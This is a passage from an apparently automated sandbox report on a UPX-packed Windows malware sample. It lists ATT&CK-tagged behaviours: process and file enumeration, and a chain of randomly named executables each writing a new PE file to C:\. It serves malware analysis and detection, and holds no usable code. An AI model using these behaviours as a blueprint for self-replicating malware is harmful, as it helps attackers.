\"IsWow64Process\" with parameter \"3416\" - (UID: 00000000-00003416)\n \"284486.exe\" called \"IsWow64Process\" with parameter \"1408\" - (UID: 00000000-00001408)\n \"4088420.exe\" called \"IsWow64Process\" with parameter \"5572\" - (UID: 00000000-00005572)\n \"6466820.exe\" called \"IsWow64Process\" with parameter \"704\" - (UID: 00000000-00000704)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" called \"FindFirstFileW\" with parameter c:\\*.* (UID: 00000000-00005476)\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" called \"FindNextFileW\" with parameter $Recycle.Bin (UID: 00000000-00005476)\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" called \"FindNextFileW\" with parameter 242680.exe (UID: 00000000-00005476)\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" called \"FindNextFileW\" with parameter autoexec.bat (UID: 00000000-00005476)\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" called \"FindNextFileW\" with parameter config.sys (UID: 00000000-00005476)\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" called \"FindNextFileW\" with parameter Documents and Settings (UID: 00000000-00005476)\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" called \"FindNextFileW\" with parameter dotnet.au3 (UID: 00000000-00005476)\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" called \"FindNextFileW\" with parameter dotnet48.exe (UID: 00000000-00005476)\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" called \"FindNextFileW\" with parameter edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe (UID: 00000000-00005476)\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" called \"FindNextFileW\" with parameter MSOCache (UID: 00000000-00005476)\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" called \"FindNextFileW\" with parameter pagefile.sys (UID: 00000000-00005476)\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" called \"FindNextFileW\" with parameter PerfLogs (UID: 00000000-00005476)\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" called \"FindNextFileW\" with parameter Program Files (UID: 00000000-00005476)\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" called \"FindNextFileW\" with parameter ProgramData (UID: 00000000-00005476)\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" called \"FindNextFileW\" with parameter Recovery (UID: 00000000-00005476)\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" called \"FindNextFileW\" with parameter System Volume Information (UID: 00000000-00005476)\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" called \"FindNextFileW\" with parameter Temp (UID: 00000000-00005476)\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" called \"FindNextFileW\" with parameter TorService (UID: 00000000-00005476)\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" called \"FindNextFileW\" with parameter Users (UID: 00000000-00005476)\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" called \"FindNextFileW\" with parameter Windows (UID: 00000000-00005476)\n \"242680.exe\" called \"FindFirstFileW\" with parameter c:\\*.* (UID: 00000000-00005352)\n \"242680.exe\" called \"FindNextFileW\" with parameter $Recycle.Bin (UID: 00000000-00005352)\n \"242680.exe\" called \"FindNextFileW\" with parameter 06484.exe (UID: 00000000-00005352)\n \"242680.exe\" called \"FindNextFileW\" with parameter 242680.exe (UID: 00000000-00005352)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"242680.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"26802.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"xrnbdjd.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"jrfxlf.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"8844064.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"pxjrr.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"bnjjv.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"626400.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"880202.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"nvrtbh.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"dppbn.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"xvnnn.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"fbtltj.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"0080208.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"thntdfd.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"xxlthnt.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"vldfrx.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"4288806.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"8024466.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"xrfpvx.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"0824600.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"8280068.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"284486.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"4088420.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"6466820.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-4", "relevance": 10, "name": "Entrypoint in PE header is within an uncommon section", "description": "\"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0\" has an entrypoint in section \"UPX1\"\n \"fvxfr.exe\" has an entrypoint in section \"UPX1\"\n \"fpnhxpp.exe\" has an entrypoint in section \"UPX1\"\n \"dlnbh.exe\" has an entrypoint in section \"UPX1\"\n \"jfjjpnn.exe\" has an entrypoint in section \"UPX1\"\n \"bttxlfh.exe\" has an entrypoint in section \"UPX1\"\n \"hlphd.exe\" has an entrypoint in section \"UPX1\"\n \"8664860.exe\" has an entrypoint in section \"UPX1\"\n \"868480.exe\" has an entrypoint in section \"UPX1\"\n \"44822.exe\" has an entrypoint in section \"UPX1\"\n \"06066.exe\" has an entrypoint in section \"UPX1\"\n \"lxvrdvn.exe\" has an entrypoint in section \"UPX1\"\n \"dlvbt.exe\" has an entrypoint in section \"UPX1\"\n \"pfftl.exe\" has an entrypoint in section \"UPX1\"\n \"hfrvlvv.exe\" has an entrypoint in section \"UPX1\"\n \"tfjtht.exe\" has an entrypoint in section \"UPX1\"\n \"02488.exe\" has an entrypoint in section \"UPX1\"\n \"24026.exe\" has an entrypoint in section \"UPX1\"\n \"020286.exe\" has an entrypoint in section \"UPX1\"\n \"fnttpf.exe\" has an entrypoint in section \"UPX1\"\n \"lpftbf.exe\" has an entrypoint in section \"UPX1\"\n \"bhbtd.exe\" has an entrypoint in section \"UPX1\"\n \"vtbthnv.exe\" has an entrypoint in section \"UPX1\"\n \"hbrjl.exe\" has an entrypoint in section \"UPX1\"\n \"bnvxpv.exe\" has an entrypoint in section \"UPX1\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" wrote 15412 bytes starting with PE header signature to file \"C:\\242680.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"242680.exe\" wrote 15431 bytes starting with PE header signature to file \"C:\\06484.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"06484.exe\" wrote 15441 bytes starting with PE header signature to file \"C:\\26802.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"26802.exe\" wrote 15451 bytes starting with PE header signature to file \"C:\\06224.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"06224.exe\" wrote 15462 bytes starting with PE header signature to file \"C:\\xrnbdjd.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"xrnbdjd.exe\" wrote 15473 bytes starting with PE header signature to file \"C:\\njljtn.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"njljtn.exe\" wrote 15488 bytes starting with PE header signature to file \"C:\\xvdbp.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"xvdbp.exe\" wrote 15503 bytes starting with PE header signature to file \"C:\\plfthj.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"plfthj.exe\" wrote 15517 bytes starting with PE header signature to file \"C:\\jrfxlf.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"jrfxlf.exe\" wrote 15530 bytes starting with PE header signature to file \"C:\\8844064.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"8844064.exe\" wrote 15544 bytes starting with PE header signature to file \"C:\\pxjrr.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"pxjrr.exe\" wrote 15561 bytes starting with PE header signature to file \"C:\\bnjjv.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"bnjjv.exe\" wrote 15573 bytes starting with PE header signature to file \"C:\\626400.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"626400.exe\" wrote 15586 bytes starting with PE header signature to file \"C:\\882066.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"882066.exe\" wrote 15601 bytes starting with PE header signature to file \"C:\\880202.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"880202.exe\" wrote 15618 bytes starting with PE header signature to file \"C:\\nvrtbh.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"nvrtbh.exe\" wrote 15637 bytes starting with PE header signature to file \"C:\\hnbnnnb.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"hnbnnnb.exe\" wrote 15647 bytes starting with PE header signature to file \"C:\\dppbn.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"dppbn.exe\" wrote 15659 bytes starting with PE header signature to file \"C:\\dxrftlp.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"dxrftlp.exe\" wrote 15669 bytes starting with PE header signature to file \"C:\\xvnnn.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"xvnnn.exe\" wrote 15684 bytes starting with PE header signature to file \"C:\\ftvfbtx.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"ftvfbtx.exe\" wrote 15700 bytes starting with PE header signature to file \"C:\\rxvhlp.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"rxvhlp.exe\" wrote 15715 bytes starting with PE header signature to file \"C:\\fbtltj.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"fbtltj.exe\" wrote 15726 bytes starting with PE header signature to file \"C:\\0064284.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"0064284.exe\" wrote 15736 bytes starting with PE header signature to file \"C:\\484088.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"484088.exe\" wrote 15750 bytes starting with PE header signature to file \"C:\\62266.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"62266.exe\" wrote 15762 bytes starting with PE header signature to file \"C:\\0080208.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"0080208.exe\" wrote 15772 bytes starting with PE header signature to file \"C:\\648268.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"648268.exe\" wrote 15785 bytes starting with PE header signature to file \"C:\\thntdfd.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"thntdfd.exe\" wrote 15797 bytes starting with PE header signature to file \"C:\\bdvpj.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"bdvpj.exe\" wrote 15810 bytes starting with PE header signature to file \"C:\\xxlthnt.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"xxlthnt.exe\" wrote 15822 bytes starting with PE header signature to file \"C:\\jbvvj.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"jbvvj.exe\" wrote 15842 bytes starting with PE header signature to file \"C:\\vldfrx.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"vldfrx.exe\" wrote 15855 bytes starting with PE header signature to file \"C:\\408822.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"408822.exe\" wrote 15867 bytes starting with PE header signature to file \"C:\\00644.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"00644.exe\" wrote 15883 bytes starting with PE header signature to file \"C:\\24226.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"24226.exe\" wrote 15894 bytes starting with PE header signature to file \"C:\\4288806.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"4288806.exe\" wrote 15914 bytes starting with PE header signature to file \"C:\\604420.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"604420.exe\" wrote 15925 bytes starting with PE header signature to file \"C:\\042464.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"042464.exe\" wrote 15941 bytes starting with PE header signature to file \"C:\\0806624.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"0806624.exe\" wrote 15960 bytes starting with PE header signature to file \"C:\\8024466.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"8024466.exe\" wrote 15977 bytes starting with PE header signature to file \"C:\\4640626.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"4640626.exe\" wrote 15993 bytes starting with PE header signature to file \"C:\\xrfpvx.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"xrfpvx.exe\" wrote 16004 bytes starting with PE header signature to file \"C:\\hrhfdtt.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"hrhfdtt.exe\" wrote 16019 bytes starting with PE header signature to file \"C:\\fdjlrbp.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"fdjlrbp.exe\" wrote 16036 bytes starting with PE header signature to file \"C:\\0824600.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"0824600.exe\" wrote 16056 bytes starting with PE header signature to file \"C:\\8280068.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"8280068.exe\" wrote 16075 bytes starting with PE header signature to file \"C:\\284486.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"284486.exe\" wrote 16087 bytes starting with PE header signature to file \"C:\\408628.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"408628.exe\" wrote 16099 bytes starting with PE header signature to file \"C:\\4088420.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"4088420.exe\" wrote 16110 bytes starting with PE header signature to file \"C:\\6466820.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"6466820.exe\" wrote 16121 bytes starting with PE header signature to file \"C:\\ntnbrnr.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"ntnbrnr.exe\" wrote 16138 bytes starting with PE header signature to file \"C:\\rnhbh.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"rnhbh.exe\" wrote 16154 bytes starting with PE header signature to file \"C:\\bnvxpv.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"bnvxpv.exe\" wrote 16165 bytes starting with PE header signature to file \"C:\\hbrjl.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"hbrjl.exe\" wrote 16175 bytes starting with PE header signature to file \"C:\\vtbthnv.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"vtbthnv.exe\" wrote 16185 bytes starting with PE header signature to file \"C:\\bhbtd.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"bhbtd.exe\" wrote 16201 bytes starting with PE header signature to file \"C:\\lpftbf.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"lpftbf.exe\" wrote 16218 bytes starting with PE header signature to file \"C:\\fnttpf.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"fnttpf.exe\" wrote 16238 bytes starting with PE header signature to file \"C:\\020286.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"020286.exe\" wrote 16257 bytes starting with PE header signature to file \"C:\\24026.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"24026.exe\" wrote 16270 bytes starting with PE header signature to file \"C:\\02488.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"02488.exe\" wrote 16284 bytes starting with PE header signature to file \"C:\\tfjtht.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"tfjtht.exe\" wrote 16295 bytes starting with PE header signature to file \"C:\\hfrvlvv.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, 